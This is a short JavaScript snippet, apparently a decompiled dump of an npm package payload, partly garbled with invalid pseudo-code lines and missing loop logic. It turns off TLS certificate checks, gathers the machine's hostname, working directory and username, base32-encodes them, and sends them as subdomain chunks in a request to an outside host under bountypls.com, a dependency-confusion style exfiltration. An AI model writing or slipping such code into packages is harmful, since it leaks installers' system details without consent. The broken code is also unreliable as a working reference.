const request = require('request')
const os = require('os')
const process = require('process')
const base32Encode = require('base32-encode')
process.env["NODE_TLS_REJECT_UNAUTHORIZED"] = 0
let cwd = process.cwd()
let hostname = os.hostname()
let user = os.userInfo()
<operator>.formatString("<packageName>|", hostname, "|", cwd, "|", user.username, "")
data = Buffer.from(data, 'utf8')
let b = base32Encode(data, 'RFC4648', {padding: false})
__ecma.Array.factory()
let chunkSize = 40
let charsLength = b.length
chunks.push(b.substring(i, i + chunkSize))
data = chunks.join('.')
<operator>.formatString("https://", data, ".npm.bountypls.com")
request(url, {}, (err, res, body) =>{
    if (err) {return console.log(err);}
})
